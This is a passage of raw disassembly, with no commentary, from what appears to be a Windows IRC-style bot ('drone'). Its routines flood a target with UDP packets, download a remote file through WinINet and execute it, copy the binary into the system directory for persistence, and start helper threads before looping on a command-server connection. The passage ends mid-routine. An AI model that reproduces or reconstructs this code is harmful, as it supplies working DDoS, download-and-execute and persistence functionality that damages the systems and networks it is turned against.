		push	eax
		call	ds:dword_41E244	; gethostbyname
		mov	esi, eax
		test	esi, esi
		jnz	short loc_41C36E
		lea	eax, [esp+128h]
		push	eax
		push	offset aUdpErrorSendin ; "UDP: Error Sending UDP Packets to %s"
		jmp	loc_41C4BD
; ---------------------------------------------------------------------------

loc_41C36E:				; CODE XREF: .text:0041C346j
					; .text:0041C35Aj
		lea	eax, [esp+128h]
		push	eax
		push	offset aUdpSendingUdpP ; "UDP: Sending UDP Packets to %s"
		lea	eax, [esp+30h]
		push	eax
		push	dword ptr [esp+244h]
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 14h
		test	esi, esi
		jz	short loc_41C39F
		mov	eax, [esi+0Ch]
		mov	eax, [eax]
		jmp	short loc_41C3A3
; ---------------------------------------------------------------------------

loc_41C39F:				; CODE XREF: .text:0041C396j
		lea	eax, [esp+10h]

loc_41C3A3:				; CODE XREF: .text:0041C39Dj
		mov	eax, [eax]
		push	dword ptr [esp+234h]
		mov	edi, ds:dword_41E270
		mov	[esp+20h], eax
		call	edi	; htons
		xor	ecx, ecx
		inc	ecx
		cmp	[esp+234h], ecx
		mov	[esp+1Ah], ax
		jge	short loc_41C3D0
		mov	[esp+234h], ecx

loc_41C3D0:				; CODE XREF: .text:0041C3C7j
		mov	ebx, 0FFFFh
		cmp	[esp+234h], ebx
		jle	short loc_41C3E5
		mov	[esp+234h], ebx

loc_41C3E5:				; CODE XREF: .text:0041C3DCj
		mov	eax, [esp+230h]
		push	0Ah
		cdq
		pop	esi
		idiv	esi
		xor	esi, esi
		cmp	[esp+228h], esi
		mov	[esp+230h], eax
		jnz	short loc_41C40B
		mov	[esp+228h], ecx

loc_41C40B:				; CODE XREF: .text:0041C402j
		cmp	[esp+22Ch], esi
		jle	loc_41C49F

loc_41C418:				; CODE XREF: .text:0041C434j
		call	sub_4038F1
		cdq
		mov	ecx, 0FFh
		idiv	ecx
		inc	esi
		cmp	esi, [esp+22Ch]
		mov	[esp+esi+23Fh],	dl
		jl	short loc_41C418
		jmp	short loc_41C49F
; ---------------------------------------------------------------------------

loc_41C438:				; CODE XREF: .text:0041C4A7j
		dec	dword ptr [esp+230h]
		push	0Bh
		pop	esi

loc_41C442:				; CODE XREF: .text:0041C480j
		push	10h
		lea	eax, [esp+1Ch]
		push	eax
		push	0
		call	sub_4038F1
		push	0Ah
		cdq
		pop	ecx
		idiv	ecx
		mov	eax, [esp+238h]
		sub	eax, edx
		push	eax
		lea	eax, [esp+250h]
		push	eax
		push	dword ptr [esp+28h]
		call	ds:dword_41E248	; sendto
		push	dword ptr [esp+228h]
		call	ds:off_41E0F8
		dec	esi
		jnz	short loc_41C442
		cmp	dword ptr [esp+234h], 1
		jnz	short loc_41C49F
		call	sub_4038F1
		cdq
		mov	ecx, ebx
		idiv	ecx
		inc	edx
		push	edx
		call	edi	; htons
		mov	[esp+1Ah], ax

loc_41C49F:				; CODE XREF: .text:0041C412j
					; .text:0041C436j ...
		cmp	dword ptr [esp+230h], 0
		jg	short loc_41C438
		dec	dword ptr [esp+230h]
		lea	eax, [esp+128h]
		push	eax
		push	offset aUdpFinishedSen ; "UDP: Finished	Sending	UDP Packets to %s"...

loc_41C4BD:				; CODE XREF: .text:0041C369j
		lea	eax, [esp+30h]
		push	eax
		push	dword ptr [esp+244h]
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 14h
		call	ds:dword_41E0DC	; GetCurrentThreadId
		push	eax
		call	sub_414CA5
		pop	ecx
		mov	ecx, [esp+10224h]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		xor	eax, eax
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	4

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41C4FC	proc near		; DATA XREF: sub_40177B+234o
					; sub_4019F3+1E6o

var_750		= dword	ptr -750h
var_74C		= dword	ptr -74Ch
var_748		= dword	ptr -748h
var_744		= dword	ptr -744h
var_740		= dword	ptr -740h
var_73C		= byte ptr -73Ch
var_738		= byte ptr -738h
var_638		= byte ptr -638h
var_615		= byte ptr -615h
var_515		= byte ptr -515h
var_415		= byte ptr -415h
var_414		= byte ptr -414h
var_413		= dword	ptr -413h
var_408		= byte ptr -408h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 754h
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+754h+var_4], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		mov	ecx, 0C9h
		lea	edi, [esp+760h+var_738]
		rep movsd
		xor	ebx, ebx
		push	ebx
		push	ebx
		push	ebx
		movsw
		push	ebx
		push	offset aMozilla5_0 ; "Mozilla/5.0"
		movsb
		call	ds:dword_41E218	; InternetOpenA
		mov	esi, eax
		lea	eax, [esp+760h+var_515]
		push	eax
		lea	eax, [esp+764h+var_615]
		push	eax
		push	offset aDlDownloadingS ; "DL: Downloading %s to	%s"
		lea	eax, [esp+76Ch+var_738]
		push	eax
		push	[esp+770h+var_413]
		mov	edi, offset dword_428D1C
		push	edi
		call	sub_417FE1
		add	esp, 18h
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		lea	eax, [esp+770h+var_615]
		push	eax
		push	esi
		call	ds:dword_41E214	; InternetOpenUrlA
		cmp	esi, ebx
		mov	[esp+760h+var_744], eax
		jz	loc_41C71B
		cmp	eax, ebx
		jz	loc_41C714
		push	ebx
		push	ebx
		push	2
		push	ebx
		push	ebx
		push	40000000h
		lea	eax, [esp+778h+var_515]
		push	eax
		call	ds:off_41E06C
		mov	[esp+760h+var_748], eax
		call	ds:dword_41E104	; GetTickCount
		mov	[esp+760h+var_740], eax
		mov	[esp+760h+var_750], ebx
		mov	esi, 400h

loc_41C5C3:				; CODE XREF: sub_41C4FC+11Fj
		push	esi
		lea	eax, [esp+764h+var_408]
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [esp+760h+var_74C]
		push	eax
		push	esi
		lea	eax, [esp+768h+var_408]
		push	eax
		push	[esp+76Ch+var_744]
		call	ds:dword_41E210	; InternetReadFile
		push	ebx
		lea	eax, [esp+764h+var_73C]
		push	eax
		push	[esp+768h+var_74C]
		lea	eax, [esp+76Ch+var_408]
		push	eax
		push	[esp+770h+var_748]
		call	ds:off_41E088
		test	eax, eax
		jz	loc_41C6C6
		mov	eax, [esp+760h+var_74C]
		add	[esp+760h+var_750], eax
		cmp	eax, ebx
		ja	short loc_41C5C3
		call	ds:dword_41E104	; GetTickCount
		sub	eax, [esp+760h+var_740]
		xor	edx, edx
		mov	ecx, 3E8h
		div	ecx
		mov	ecx, eax
		cmp	ecx, ebx
		jnz	short loc_41C639
		xor	ecx, ecx
		inc	ecx

loc_41C639:				; CODE XREF: sub_41C4FC+138j
		mov	eax, [esp+760h+var_750]
		xor	edx, edx
		div	ecx
		shr	eax, 0Ah
		push	eax
		push	ecx
		push	[esp+768h+var_750]
		lea	eax, [esp+76Ch+var_515]
		push	eax
		push	offset aDlDownloadSIBy ; "DL: Download %s (%i Bytes) finished in "...
		lea	eax, [esp+774h+var_738]
		push	eax
		push	[esp+778h+var_413]
		push	edi
		call	sub_417FE1
		add	esp, 20h
		push	[esp+760h+var_748]
		call	ds:off_41E0D8
		cmp	[esp+760h+var_415], 1
		jnz	loc_41C735
		cmp	[esp+760h+var_414], bl
		lea	eax, [esp+760h+var_515]
		jz	short loc_41C6D4
		push	eax
		call	sub_419E99
		test	al, al
		pop	ecx
		lea	eax, [esp+760h+var_738]
		jz	short loc_41C6CD
		push	offset aMainUninstalli ; "Main:	Uninstalling Drone"
		push	eax
		push	[esp+768h+var_413]
		push	edi
		call	sub_417FE1
		add	esp, 10h
		lea	eax, [esp+760h+var_638]
		push	eax
		call	sub_41A0E3

loc_41C6C6:				; CODE XREF: sub_41C4FC+10Fj
		push	offset aDlFailedBadLoc ; "DL: Failed; Bad Location."
		jmp	short loc_41C720
; ---------------------------------------------------------------------------

loc_41C6CD:				; CODE XREF: sub_41C4FC+1A5j
		push	offset aDlFailedToUpda ; "DL: Failed To	Update"
		jmp	short loc_41C724
; ---------------------------------------------------------------------------

loc_41C6D4:				; CODE XREF: sub_41C4FC+196j
		push	5
		push	ebx
		push	ebx
		push	eax
		push	offset byte_41FF2F
		push	ebx
		call	ds:dword_41E1E0
		test	eax, eax
		jnz	short loc_41C6F0
		push	offset aDlErrorExecuti ; "DL: Error Executing File."
		jmp	short loc_41C720
; ---------------------------------------------------------------------------

loc_41C6F0:				; CODE XREF: sub_41C4FC+1EBj
		lea	eax, [esp+760h+var_515]
		push	eax
		push	offset aDlExecutedFile ; "DL: Executed File: %s"
		lea	eax, [esp+768h+var_738]
		push	eax
		push	[esp+76Ch+var_413]
		push	edi
		call	sub_417FE1
		add	esp, 14h
		jmp	short loc_41C735
; ---------------------------------------------------------------------------

loc_41C714:				; CODE XREF: sub_41C4FC+91j
		push	offset aDlFailedBadUrl ; "DL: Failed; Bad URL"
		jmp	short loc_41C720
; ---------------------------------------------------------------------------

loc_41C71B:				; CODE XREF: sub_41C4FC+89j
		push	offset aDlFailedWinine ; "DL: Failed; WinINET Error"

loc_41C720:				; CODE XREF: sub_41C4FC+1CFj
					; sub_41C4FC+1F2j ...
		lea	eax, [esp+764h+var_738]

loc_41C724:				; CODE XREF: sub_41C4FC+1D6j
		push	eax
		push	[esp+768h+var_413]
		push	edi
		call	sub_417FE1
		add	esp, 10h

loc_41C735:				; CODE XREF: sub_41C4FC+182j
					; sub_41C4FC+216j
		call	ds:dword_41E0DC	; GetCurrentThreadId
		push	eax
		call	sub_414CA5
		pop	ecx
		mov	ecx, [esp+760h+var_4]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		xor	eax, eax
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	4
sub_41C4FC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41C75B	proc near		; CODE XREF: .text:0041D020p
					; .text:0041D03Cp ...

var_108		= dword	ptr -108h
var_104		= byte ptr -104h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 108h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	eax
		lea	eax, [ebp+var_104]
		push	100h
		push	eax
		mov	dword ptr [esi], offset	off_421C18
		mov	[ebp+var_108], esi
		call	sub_40307C
		mov	eax, dword_437680
		add	esp, 0Ch
		lea	edx, [ebp+var_108]
		push	edx
		mov	ecx, offset dword_43767C
		push	eax
		push	ecx
		call	sub_40121E
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		mov	eax, esi
		call	sub_402C9E
		leave
		retn	4
sub_41C75B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41C7BA	proc near		; CODE XREF: .text:00404674p

var_728		= dword	ptr -728h
var_724		= dword	ptr -724h
var_720		= byte ptr -720h
var_718		= dword	ptr -718h
var_714		= dword	ptr -714h
var_680		= byte ptr -680h
var_4EC		= byte ptr -4ECh
var_4E0		= byte ptr -4E0h
var_4DF		= byte ptr -4DFh
var_4A8		= byte ptr -4A8h
var_4A7		= byte ptr -4A7h
var_428		= byte ptr -428h
var_427		= byte ptr -427h
var_320		= byte ptr -320h
var_31F		= byte ptr -31Fh
var_218		= byte ptr -218h
var_217		= byte ptr -217h
var_110		= byte ptr -110h
var_10F		= byte ptr -10Fh
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 72Ch
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+72Ch+var_4], eax
		mov	eax, [ebp+arg_8]
		push	ebx
		push	esi
		push	edi
		mov	[esp+738h+var_728], eax
		call	sub_41A2E3
		test	al, al
		jnz	loc_41CC13
		call	sub_41A258
		test	al, al
		jnz	short loc_41C7FA
		call	ds:off_41E08C

loc_41C7FA:				; CODE XREF: sub_41C7BA+38j
		mov	esi, offset aInstall ; "--install "
		lea	edi, [esp+738h+var_4EC]
		movsd
		movsd
		movsw
		movsb
		mov	edi, 103h
		xor	ebx, ebx
		push	edi
		lea	eax, [esp+73Ch+var_10F]
		push	ebx
		push	eax
		mov	[esp+744h+var_110], bl
		call	sub_408130
		add	esp, 0Ch
		push	edi
		lea	eax, [esp+73Ch+var_31F]
		push	ebx
		push	eax
		mov	[esp+744h+var_320], bl
		call	sub_408130
		add	esp, 0Ch
		push	edi
		lea	eax, [esp+73Ch+var_427]
		push	ebx
		push	eax
		mov	[esp+744h+var_428], bl
		call	sub_408130
		add	esp, 0Ch
		push	7Fh
		lea	eax, [esp+73Ch+var_4A7]
		push	ebx
		push	eax
		mov	[esp+744h+var_4A8], bl
		call	sub_408130
		add	esp, 0Ch
		push	edi
		lea	eax, [esp+73Ch+var_110]
		push	eax
		call	ds:dword_41E0F0	; GetSystemDirectoryA
		push	80h
		lea	esi, [esp+73Ch+var_4A8]
		mov	ebx, offset aDfstcvDsd ; "τ"
		call	sub_41A33D
		pop	ecx
		mov	eax, esi
		push	eax
		lea	eax, [esp+73Ch+var_110]
		push	eax
		push	offset aSS_6	; "%s\\%s"
		lea	eax, [esp+744h+var_428]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [esp+74Ch+var_428]
		add	esp, 14h
		lea	ecx, [eax+1]

loc_41C8C8:				; CODE XREF: sub_41C7BA+113j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41C8C8
		sub	eax, ecx
		xor	ebx, ebx
		mov	[esp+eax+738h+var_428],	bl
		mov	esi, 104h
		push	esi
		lea	eax, [esp+73Ch+var_320]
		push	eax
		push	ebx
		call	ds:dword_41E0E0	; GetModuleHandleA
		push	eax
		call	ds:dword_41E060	; GetModuleFileNameA
		lea	eax, [esp+738h+var_4EC]
		lea	ecx, [eax+1]

loc_41C900:				; CODE XREF: sub_41C7BA+14Bj
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_41C900
		sub	eax, ecx
		push	eax
		lea	eax, [esp+73Ch+var_4EC]
		push	eax
		push	[esp+740h+var_728]
		call	sub_402F77
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_41C988
		push	esi
		lea	eax, [esp+73Ch+var_428]
		push	eax
		lea	eax, [esp+740h+var_320]
		push	eax
		call	sub_402F77
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_41C988
		push	ebx
		lea	eax, [esp+73Ch+var_428]
		push	eax
		lea	eax, [esp+740h+var_320]
		push	eax
		call	ds:dword_41E080	; CopyFileA
		test	eax, eax
		jz	loc_41CC13
		lea	eax, [esp+738h+var_320]
		push	eax
		lea	eax, [esp+73Ch+var_4EC]
		push	eax
		lea	eax, [esp+740h+var_428]
		push	eax
		push	offset aSSS_0	; "%s %s%s"
		call	sub_419E99
		add	esp, 10h
		jmp	loc_41CC13
; ---------------------------------------------------------------------------

loc_41C988:				; CODE XREF: sub_41C7BA+166j
					; sub_41C7BA+183j
		lea	eax, [esp+738h+var_4EC]
		lea	edx, [eax+1]

loc_41C992:				; CODE XREF: sub_41C7BA+1DDj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41C992
		sub	eax, edx
		push	eax
		lea	eax, [esp+73Ch+var_4EC]
		push	eax
		push	[esp+740h+var_728]
		call	sub_402F77
		add	esp, 0Ch
		test	eax, eax
		jnz	loc_41CA43
		push	esi
		lea	eax, [esp+73Ch+var_428]
		push	eax
		lea	eax, [esp+740h+var_320]
		push	eax
		call	sub_402F77
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_41CA43
		push	edi
		lea	eax, [esp+73Ch+var_217]
		push	ebx
		push	eax
		mov	[esp+744h+var_218], bl
		call	sub_408130
		lea	eax, [esp+744h+var_4EC]
		add	esp, 0Ch
		lea	edi, [eax+1]

loc_41C9F8:				; CODE XREF: sub_41C7BA+243j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41C9F8
		mov	ecx, [esp+738h+var_728]
		sub	eax, edi
		add	eax, ecx
		push	eax
		push	offset aS_12	; "%s"
		lea	eax, [esp+740h+var_218]
		push	esi
		push	eax
		call	sub_40307C
		add	esp, 10h
		xor	esi, esi

loc_41CA20:				; CODE XREF: sub_41C7BA+287j
		lea	eax, [esp+738h+var_218]
		push	eax
		call	ds:off_41E0CC
		test	eax, eax
		jnz	short loc_41CA43
		push	0C8h
		call	ds:off_41E0F8
		inc	esi
		cmp	esi, 3
		jb	short loc_41CA20

loc_41CA43:				; CODE XREF: sub_41C7BA+1F8j
					; sub_41C7BA+219j ...
		push	80h
		lea	eax, [esp+73Ch+var_4A8]
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 0Ch
		push	37h
		lea	eax, [esp+73Ch+var_4DF]
		push	ebx
		push	eax
		mov	[esp+744h+var_4E0], bl
		call	sub_408130
		add	esp, 0Ch
		push	38h
		lea	esi, [esp+73Ch+var_4E0]
		mov	ebx, offset aDIoIa ; ""
		call	sub_41A33D
		pop	ecx
		mov	eax, esi
		push	eax
		push	1
		xor	ebx, ebx
		push	ebx
		call	ds:off_41E084
		push	38h
		mov	esi, eax
		lea	eax, [esp+73Ch+var_4E0]
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 0Ch
		push	1388h
		push	esi
		call	ds:off_41E07C
		cmp	eax, 102h
		jnz	short loc_41CAC4
		push	ebx
		call	ds:off_41E050

loc_41CAC4:				; CODE XREF: sub_41C7BA+301j
		call	sub_417C06
		push	8
		call	sub_4035D9
		cmp	eax, ebx
		pop	ecx
		jz	short loc_41CAE8
		push	offset sub_417D99
		xor	ecx, ecx
		mov	edi, offset aRm	; "RM"
		mov	esi, eax
		call	sub_414D0E

loc_41CAE8:				; CODE XREF: sub_41C7BA+319j
		lea	eax, [esp+738h+var_718]
		push	eax
		mov	[esp+73Ch+var_718], 94h
		call	ds:dword_41E068	; GetVersionExA
		cmp	[esp+738h+var_714], 4
		jz	short loc_41CB21
		push	8
		call	sub_4035D9
		cmp	eax, ebx
		pop	ecx
		jz	short loc_41CB21
		push	offset sub_41AB0C
		xor	ecx, ecx
		mov	edi, offset aBk	; "BK"
		mov	esi, eax
		call	sub_414D0E

loc_41CB21:				; CODE XREF: sub_41C7BA+346j
					; sub_41C7BA+352j
		push	8
		mov	byte_428D20, bl
		call	sub_4035D9
		cmp	eax, ebx
		pop	ecx
		jz	short loc_41CB46
		push	offset sub_418F81
		xor	ecx, ecx
		mov	edi, offset aUnm ; "UNM"
		mov	esi, eax
		call	sub_414D0E

loc_41CB46:				; CODE XREF: sub_41C7BA+377j
		lea	eax, [esp+738h+var_680]
		push	eax
		push	202h
		call	ds:dword_41E274	; WSAStartup
		test	eax, eax
		jnz	loc_41CC0D
		call	sub_419F7B
		mov	byte_43737D, bl
		call	sub_41C12F
		mov	eax, [ebp+arg_0]
		mov	byte_428C14, bl
		mov	dword_428A04, eax
		call	sub_419997
		mov	eax, dword_437680
		mov	eax, [eax]
		mov	ebx, offset dword_43767C
		mov	[esp+738h+var_724], eax
		mov	[esp+738h+var_728], ebx

loc_41CB98:				; CODE XREF: sub_41C7BA+409j
		cmp	[esp+738h+var_728], 0
		mov	esi, dword_437680
		jz	short loc_41CBAB
		cmp	[esp+738h+var_728], ebx
		jz	short loc_41CBB0

loc_41CBAB:				; CODE XREF: sub_41C7BA+3E9j
		call	sub_4034EB

loc_41CBB0:				; CODE XREF: sub_41C7BA+3EFj
		cmp	[esp+738h+var_724], esi
		jz	short loc_41CBC5
		lea	edi, [esp+738h+var_720]
		lea	esi, [esp+738h+var_728]
		call	sub_40166F
		jmp	short loc_41CB98
; ---------------------------------------------------------------------------

loc_41CBC5:				; CODE XREF: sub_41C7BA+3FAj
		mov	esi, offset dword_428D1C

loc_41CBCA:				; CODE XREF: sub_41C7BA+451j
		movsx	eax, word_427030
		push	eax
		push	offset dword_426E30
		mov	edx, offset aIuvPPdPdx ; "ϏяϏ"
		mov	ecx, esi
		call	sub_418CAF
		test	al, al
		jz	short loc_41CBF9
		mov	byte_428D20, 1

loc_41CBEE:				; CODE XREF: sub_41C7BA+43Dj
		mov	ecx, esi
		call	sub_418B81
		test	al, al
		jnz	short loc_41CBEE

loc_41CBF9:				; CODE XREF: sub_41C7BA+42Bj
		push	3A98h
		mov	byte_428D20, 0
		call	ds:off_41E0F8
		jmp	short loc_41CBCA
; ---------------------------------------------------------------------------

loc_41CC0D:				; CODE XREF: sub_41C7BA+3A1j
		call	ds:dword_41E240	; WSACleanup

loc_41CC13:				; CODE XREF: sub_41C7BA+2Bj
					; sub_41C7BA+19Ej ...
		mov	ecx, [esp+738h+var_4]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		xor	eax, eax
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	10h
sub_41C7BA	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_41CC30	proc near		; CODE XREF: sub_419A20+2Fp
					; sub_419A20+6Cp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	edi
		push	esi
		push	ebx
		xor	edi, edi
		mov	eax, [esp+0Ch+arg_4]
		or	eax, eax
		jge	short loc_41CC51
		inc	edi
		mov	edx, [esp+0Ch+arg_0]
		neg	eax
		neg	edx
		sbb	eax, 0
		mov	[esp+0Ch+arg_4], eax
		mov	[esp+0Ch+arg_0], edx

loc_41CC51:				; CODE XREF: sub_41CC30+Bj
		mov	eax, [esp+0Ch+arg_C]
		or	eax, eax
		jge	short loc_41CC6D
		inc	edi
		mov	edx, [esp+0Ch+arg_8]
		neg	eax
		neg	edx
		sbb	eax, 0
		mov	[esp+0Ch+arg_C], eax
		mov	[esp+0Ch+arg_8], edx

loc_41CC6D:				; CODE XREF: sub_41CC30+27j
		or	eax, eax
		jnz	short loc_41CC89
		mov	ecx, [esp+0Ch+arg_8]
		mov	eax, [esp+0Ch+arg_4]
		xor	edx, edx
		div	ecx
		mov	ebx, eax
		mov	eax, [esp+0Ch+arg_0]
		div	ecx
		mov	edx, ebx
		jmp	short loc_41CCCA
; ---------------------------------------------------------------------------

loc_41CC89:				; CODE XREF: sub_41CC30+3Fj
		mov	ebx, eax
		mov	ecx, [esp+0Ch+arg_8]
		mov	edx, [esp+0Ch+arg_4]
		mov	eax, [esp+0Ch+arg_0]

loc_41CC97:				; CODE XREF: sub_41CC30+71j
		shr	ebx, 1
		rcr	ecx, 1
		shr	edx, 1
		rcr	eax, 1
		or	ebx, ebx
		jnz	short loc_41CC97
		div	ecx
		mov	esi, eax
		mul	[esp+0Ch+arg_C]
		mov	ecx, eax
		mov	eax, [esp+0Ch+arg_8]
		mul	esi
		add	edx, ecx
		jb	short loc_41CCC5
		cmp	edx, [esp+0Ch+arg_4]
		ja	short loc_41CCC5
		jb	short loc_41CCC6
		cmp	eax, [esp+0Ch+arg_0]
		jbe	short loc_41CCC6

loc_41CCC5:				; CODE XREF: sub_41CC30+85j
					; sub_41CC30+8Bj
		dec	esi

loc_41CCC6:				; CODE XREF: sub_41CC30+8Dj
					; sub_41CC30+93j
		xor	edx, edx
		mov	eax, esi

loc_41CCCA:				; CODE XREF: sub_41CC30+57j
		dec	edi
		jnz	short loc_41CCD4
		neg	edx
		neg	eax
		sbb	edx, 0

loc_41CCD4:				; CODE XREF: sub_41CC30+9Bj
		pop	ebx
		pop	esi
		pop	edi
		retn	10h
sub_41CC30	endp

; ---------------------------------------------------------------------------
		align 10h
		cmp	dword_4376DC, 0
		jz	short sub_41CD16

loc_41CCE9:				; CODE XREF: .text:0041CD14j
		push	ebp
		mov	ebp, esp
		sub	esp, 8
		and	esp, 0FFFFFFF8h
		fstp	qword ptr [esp]
		cvttsd2si eax, qword ptr [esp]
		leave
		retn
; ---------------------------------------------------------------------------
		cmp	dword_4376DC, 0
		jz	short sub_41CD16
		sub	esp, 4
		fnstcw	word ptr [esp]
		pop	eax
		and	ax, 7Fh
		cmp	ax, 7Fh
		jz	short loc_41CCE9

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41CD16	proc near		; CODE XREF: sub_41B423+520p
					; .text:0041CCE7j ...

var_20		= dword	ptr -20h
var_10		= qword	ptr -10h
var_8		= dword	ptr -8

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		and	esp, 0FFFFFFF0h
		fld	st
		fst	[esp+20h+var_8]
		fistp	[esp+20h+var_10]
		fild	[esp+20h+var_10]
		mov	edx, [esp+20h+var_8]
		mov	eax, dword ptr [esp+20h+var_10]
		test	eax, eax
		jz	short loc_41CD75

loc_41CD39:				; CODE XREF: sub_41CD16+69j
		fsubp	st(1), st
		test	edx, edx
		jns	short loc_41CD5D
		fstp	[esp+20h+var_20]
		mov	ecx, [esp+20h+var_20]
		xor	ecx, 80000000h
		add	ecx, 7FFFFFFFh
		adc	eax, 0
		mov	edx, dword ptr [esp+20h+var_10+4]
		adc	edx, 0
		jmp	short locret_41CD89
; ---------------------------------------------------------------------------

loc_41CD5D:				; CODE XREF: sub_41CD16+27j
		fstp	[esp+20h+var_20]
		mov	ecx, [esp+20h+var_20]
		add	ecx, 7FFFFFFFh
		sbb	eax, 0
		mov	edx, dword ptr [esp+20h+var_10+4]
		sbb	edx, 0
		jmp	short locret_41CD89
; ---------------------------------------------------------------------------

loc_41CD75:				; CODE XREF: sub_41CD16+21j
		mov	edx, dword ptr [esp+20h+var_10+4]
		test	edx, 7FFFFFFFh
		jnz	short loc_41CD39
		fstp	[esp+20h+var_8]
		fstp	[esp+20h+var_8]

locret_41CD89:				; CODE XREF: sub_41CD16+45j
					; sub_41CD16+5Dj
		leave
		retn
sub_41CD16	endp

; ---------------------------------------------------------------------------
		lea	ecx, [ebp-28h]
		jmp	loc_401137
; ---------------------------------------------------------------------------

loc_41CD93:				; DATA XREF: sub_402C08+2o
					; sub_402C47+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-54h]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_422828
		jmp	sub_40484E
; ---------------------------------------------------------------------------

loc_41CDAE:				; DATA XREF: sub_40BA74+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-14h]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_422BC8
		jmp	sub_40484E

; =============== S U B	R O U T	I N E =======================================



sub_41CDC9	proc near		; CODE XREF: sub_408622+14p
					; DATA XREF: sub_401442+2o

arg_4		= dword	ptr  8

		mov	edx, [esp+arg_4]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-1Ch]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_423058
		jmp	sub_40484E
sub_41CDC9	endp

; ---------------------------------------------------------------------------
		mov	ecx, [ebp-10h]
		jmp	sub_403258
; ---------------------------------------------------------------------------

loc_41CDEC:				; DATA XREF: sub_401065+2o
					; sub_4013E6+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-14h]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_423088
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		lea	ecx, [ebp-2Ch]
		jmp	loc_401137
; ---------------------------------------------------------------------------

loc_41CE0F:				; DATA XREF: sub_4016BA+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-58h]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_4230B8
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-10h]
		call	sub_4034FB
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CE34:				; DATA XREF: sub_41C12F+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-14h]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_422F70
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-10h]
		call	sub_4034FB
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CE59:				; DATA XREF: sub_419997+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-14h]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_422F9C
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-154h]
		call	sub_4034FB
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CE81:				; DATA XREF: sub_4147B2+8o
		mov	edx, [esp+8]
		lea	eax, [edx-154h]
		mov	ecx, [edx-158h]
		xor	ecx, eax
		call	sub_402C9E
		add	eax, 8
		mov	ecx, [edx-8]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_422FC8
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		lea	ecx, [ebp-28h]
		jmp	loc_401137
; ---------------------------------------------------------------------------

loc_41CEB7:				; DATA XREF: sub_40121E+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-54h]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_4230E8
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-58h]
		call	sub_4034FB
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CEDC:				; DATA XREF: .text:004024A6o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-70h]
		xor	ecx, eax
		call	sub_402C9E
